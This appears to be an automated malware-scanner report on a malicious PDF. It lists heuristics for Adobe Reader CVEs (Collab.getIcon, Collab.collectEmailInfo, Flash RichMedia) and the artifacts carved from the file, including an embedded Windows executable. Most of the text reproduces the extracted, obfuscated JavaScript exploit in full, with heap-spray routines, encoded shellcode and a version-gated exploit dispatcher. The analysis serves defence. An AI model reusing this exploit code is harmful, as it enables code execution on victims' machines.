MALICIOUS
536
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9997
Heuristics 13
-
Adobe Flash Player RichMedia exploit critical CVE likely CVE_2011_0611_FLASH_RICHMEDIAPDF combines RichMedia Flash activation with an embedded AS3 SWF loader (ByteArray/loadBytes) and shellcode heap-spray staging. This is the static exploit shape associated with CVE-2011-0611 Flash content delivered through Adobe Reader.
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Embedded Windows executable payload in PDF stream critical PDF_EMBEDDED_PE_PAYLOADPDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
RichMedia (Flash) high PDF_RICHMEDIAPDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
Extracted artifacts 7
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
8.swf |
pdf-embedded-file | PDF EmbeddedFile object 37 at offset 0x5D588 | 2779 bytes |
SHA-256: f9b01c0b2b17a5adfac5067f5830191e3a1dbec29a92edf75abb22a0c9b8ab03 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
actual_type=SWF; declared_or_context_type=PDF; filename=8.swf; kind=pdf-embedded-file Carved SWF contains ByteArray/Loader/loadBytes staging terms.
|
|||
javascript_obj0027_000.js |
pdf-javascript-stream | PDF /JS object 27 at offset 0x5C5E6 | 11871 bytes |
SHA-256: c61c75240e452b771ab3b9181c4d90410172f161e2621065860b36c1bc0f5b31 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
73 of 96 identifiers look randomly generated (e.g. 'WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154d') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] > 100)
{
for(i=0;i<18000;i++)
unes=unes+0x63
}
else
{unes= unescape}
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74\x45\x6d\x61\x69lInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function strexchg(sc){
var re = /WRJJ/g;
sc = sc.replace(re,"\x25\x75");
return sc;
}
var dsafkljll = '0x';
function myunes(buf) {
var ret =""
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret = ret+util[strTempA](Number(dsafkljll + buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
sc1=unes(strexchg("\x25\x75\x30\x43\x30\x63" +
"WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdada" +
"WRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806a" +
"WRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5" +
"WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019" +
"WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0" +
"WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6c" +
"WRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394" +
"WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356b")
)
;
sc2=unes(strexchg("WRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345" +
"WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ec" +
"WRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113" +
"WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23" +
"WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074" +
"WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601b" +
"WRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6bee" +
"WRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cdd" +
"WRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58" +
"WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7")
)
sc3=unes(strexchg("WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168" +
"WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961c" +
"WRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7c" +
"WRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378" +
"WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513" +
"WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0" +
"WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11" +
"WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5" +
"WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97" +
"WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67")
)
sc4=unes(strexchg("WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013" +
"WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5" +
"WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bba" +
"WRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cf" +
"WRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48ed" +
"WRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13" +
"WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70ed" +
"WRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67" +
"WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%\x75\x30C\x30\x43\x25u\x30\x430\x43WRJJ4919WRJJ0700\x25\x7512bb\x25\x750700WRJJ1022WRJJ0700%\x75\x30C\x30\x43\x25u\x30\x430\x43" +
"%\x75\x30C\x30\x43\x25u\x30\x430\x43WRJJ1599WRJJ0700WRJJ0124WRJJ0001WRJJ72f7WRJJ0700" +
"WRJJ0104WRJJ0001WRJJ15bbWRJJ0700WRJJ1000WRJJ0000WRJJ154dWRJJ0700" +
"WRJJ15bbWRJJ0700WRJJ0300WRJJ7ffeWRJJ7fb2WRJJ0700WRJJ15bbWRJJ0700" +
"WRJJ0011WRJJ0001WRJJa8acWRJJ0700WRJJ15bbWRJJ0700WRJJ0100WRJJ0001" +
"WRJJa8acWRJJ0700WRJJ72f7WRJJ0700WRJJ0011WRJJ0001WRJJ52e2WRJJ0700" +
"WRJJ5c54WRJJ0700WRJJffffWRJJffffWRJJ0100WRJJ0001WRJJ0000WRJJ0000" +
"WRJJ0104WRJJ0001WRJJ1000WRJJ0000WRJJ0040WRJJ0000"+
"WRJJd731WRJJ0700WRJJ15bbWRJJ0700WRJJ905aWRJJ9054WRJJ154dWRJJ0700WRJJa722"+
"WRJJ0700WRJJ15bbWRJJ0700WRJJeb5aWRJJ5815WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ1a8bWRJJ1889WRJJ154dWRJJ0700WRJJa722WRJJ0700"+
"WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ04c2WRJJfb81WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bb"+
"\x25\x750700%\x75\x30C\x30\x43\x25u\x30\x430\x43\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ee75\x25\x7505eb\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700"+
"\x25\x75e6e8\x25\x75ffff\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x7590ff\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090"+
"\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ffff\x25\x7590ff"+
"WRJJ154dWRJJ0700WRJJd731WRJJ0700WRJJ112fWRJJ0700"+
"WRJJ3030WRJJ3030\x25\x75\x30\x43\x30\x63" +
"WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdada" +
"WRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806a" +
"WRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5" +
"WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019" +
"WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0" +
"WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6c" +
"WRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394" +
"WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356b" +
"WRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345" +
"WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ec" +
"WRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113" +
"WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23" +
"WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074" +
"WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601b" +
"WRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6bee" +
"WRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cdd" +
"WRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58" +
"WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7" +
"WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168" +
"WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961c" +
"WRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7c" +
"WRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378" +
"WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513" +
"WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0" +
"WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11" +
"WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5" +
"WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97" +
"WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67" +
"WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013" +
"WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5" +
"WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bba" +
"WRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cf" +
"WRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48ed" +
"WRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13" +
"WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70ed" +
"WRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67" +
"WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("WRJJ0c0CWRJJ0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}
|
|||
embedded_pdf_00000381.exe |
embedded-pe | PDF raw stream PE payload at offset 0x381 | 370963 bytes |
SHA-256: 01124b4c3c11df9adc57fa3e32a7a27075ead5a6d1fa8d9b5dd3dff787a3bbbd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
actual_type=PE; declared_or_context_type=PDF; filename=embedded_pdf_00000381.exe; kind=embedded-pe
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 27 at offset 0x5C5E6 | 10925 bytes |
SHA-256: 900ebcaedd2d850b23c3fd17dd0232ee691254f62853a1294aa5e0a5cf966f6d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
31 of 43 identifiers look randomly generated (e.g. 'WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88da') — consistent with name-mangling obfuscation. Carved artifact contains 7 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] > 100)
{
for(i=0;i<18000;i++)
unes=unes+0x63
}
else
{unes= unescape}
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74\x45\x6d\x61\x69lInfo";
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function strexchg(sc){
var re = /WRJJ/g;
sc = sc.replace(re,"\x25\x75");
return sc;
}
var dsafkljll = '0x';
function myunes(buf) {
var ret =""
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret = ret+util[strTempA](Number(dsafkljll + buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
}
return ret;
}
sc1=unes(strexchg("%u0C0cWRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdadaWRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806aWRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6cWRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356b")
)
;
sc2=unes(strexchg("WRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ecWRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601bWRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6beeWRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cddWRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7")
)
sc3=unes(strexchg("WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961cWRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7cWRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67")
)
sc4=unes(strexchg("WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bbaWRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cfWRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48edWRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70edWRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
